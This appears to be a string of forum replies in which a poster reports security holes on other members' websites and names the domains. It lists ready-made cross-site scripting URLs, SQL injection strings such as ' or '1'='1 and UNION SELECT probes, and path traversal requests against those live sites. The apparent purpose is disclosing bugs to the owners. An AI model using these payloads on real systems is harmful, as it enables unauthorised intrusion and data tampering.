source

http://www.mp3crib.com/mymusic_upload.php?user=%22%3E%3Cmarquee%3Eownd&uid=759&dir=131-lol-bc49eb also you can xss the uid field: http://www.mp3crib.com/mymusic_upload.php?user=%22%3E%3Cmarquee%3Eownd&uid=%3Cscript%3Ealert(1);%3C/script%3E

i'll tell you... dis-allowing registeration if they have registered from that IP previously is dumb. people have ips that change and other people use them... etc... and besides my sister/brother may want to play

you dont need to strip just < and > because I'm sure you can bypass that.... (depending on how it's parsed afaik) and just use strip tags...

i register a nick with html code. I create page with html code. disabling javascript for making a page w/ price == creates page with code as price (I think that's what happned0

yeah,, and just what I meant was I was able to get it to spit out HTML code on the page.

I just got a vector. Not sure I think I made a page, went to edit it, and then changed the edit page to "><marquee>ownd... it spit out some html code.. after I clicked submit http://www.fast.st/zapwiki/demo/index.php?p=code.skin wow. I just realized... you allowed us to edit the skin of every user and page????

good job on the forums. 2 things I noticed. 1) when you view the members page you notice that there are two members name testuser... 2) I can not register it says "passwords" do not match and they do

php man I didn't call it hacking. I told you what I found.

http://www.fast.st/zapwiki/demo/index.php?p=%22%3E%3Cmarquee%3Eownd&action=source creating a page with code works. http://www.fast.st/zapwiki/demo/index.php?p=%22%3E%3Cmarquee%3Eownd

AH sorry man I forgot since it was soo long... And ok about the URL tho I find that very annoying. (just an opinion)

re-read my post... I said "when registering" and uhm... not to start flame war but what does learning php have to do with javascript? It's completly unfiltered input (the email when I view the source of the page of my profile.)

use javascript to check shit == dumb... on register I was able to register with my email as <script>alert(1);</scritpt> etc. and <marquee>ownd.

http://www.sentry.dreamhosters.com/index.php?action=posts&forum=1&id=%22%3E You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'WHERE topic_id='\">'' at line 1

http://www.fast.st/zapwiki/welcome/index.php?p=solutions.tips xss vuln when submitting a tip and having the url the same the whole time is rather annoying and does nothing to stop attacks on your site. logging out does not work.

uhm how can we test anything if we keep getting permission denied to even make a page.?

no? I'm getting a fatal error message and need to make a new account.

yeah I know/knew but I had *nothing else to do... but today atleast there was a couple sites to look at.

http://www.babble-net.com/?action=ViewBoard&id=%22%3E%3Cscript%3Ealert(1);%3C/script%3E errors... and wtf you have some funky crap going on... I go to try and exploite it and I get some weird ass error and can not look @ forums anymore, unless I make a new account http://www.babble-net.com/?action=ViewThread&id=48&pid=%22%3E%3Cscript%3Ealert(1);%3C/script%3E 1) xss 2) uhm wtf is up with your sql ? http://www.babble-net.com/?action=ViewThread&id=48&pid=1973638458 (notice: I posted it as a blank user... hmm.. lemme try changing name to admin) start using sessions for *EVERYTHING*... I change my cookie (get some error) and lawl @ it because it doesnt do anything...

I registered the nick "<marquee>shit" and it works... http://blokdudez.110mb.com/forum/show_post.php?cat=General&TOP=\%22%3E%3Cmarquee%3Eownd%20bitch omfg tooo many xss/holes... http://blokdudez.110mb.com/forum/make_topic.php?path=../../ path disclosure. messages == xssable... fix the holes then try again, and use DB instead of w/e you are currently doing. http://blokdudez.110mb.com/forum/show_post.php?cat=../../

http://espsoftwaresolutions.com/admin/admin.php?page=1 and this I was prompted with a login (which had the username and pass there IDK if it was supposed to) it's vulnerable to all sorts of nasty stuff. http://espsoftwaresolutions.com/admin/moreinfo.php?id=-1 Full path disclosure. http://espsoftwaresolutions.com/tsupport/

http://espsoftwaresolutions.com/core/1-forum.html I can modify (edit) anyones post.

http://espsoftwaresolutions.com/core/blogger.php?uname='%20or%20'1'='1 errorz http://espsoftwaresolutions.com/core/blogger.php?action=delete&blog_id=%22%3E%3Cscript%3Ealert(%22source%20r%201337%22);%3C/script%3E http://espsoftwaresolutions.com/core/blogger.php?blogid="><marquee>ownd http://espsoftwaresolutions.com/core/blogger.php?action=comment&blog_id=4&commentto=%22%3E%3Cmarquee%3Eownd http://espsoftwaresolutions.com/core/messenger.php?action=reply&message_id=28 Not a exploit but at the buttom there is the delete and reply options, but are php variables but the value of themis not shown.

if thats your store you have a sql injection vuln hub.php?hid=10%20UNION%20SELECT%20null,null,null,null oh, and here: http://outsidehub.com/ohub_out.php?aout='%20or%20'1'='1 4 columns am I right?

i meant for example I could edit index.php...

directory /home/test/ is still viewable...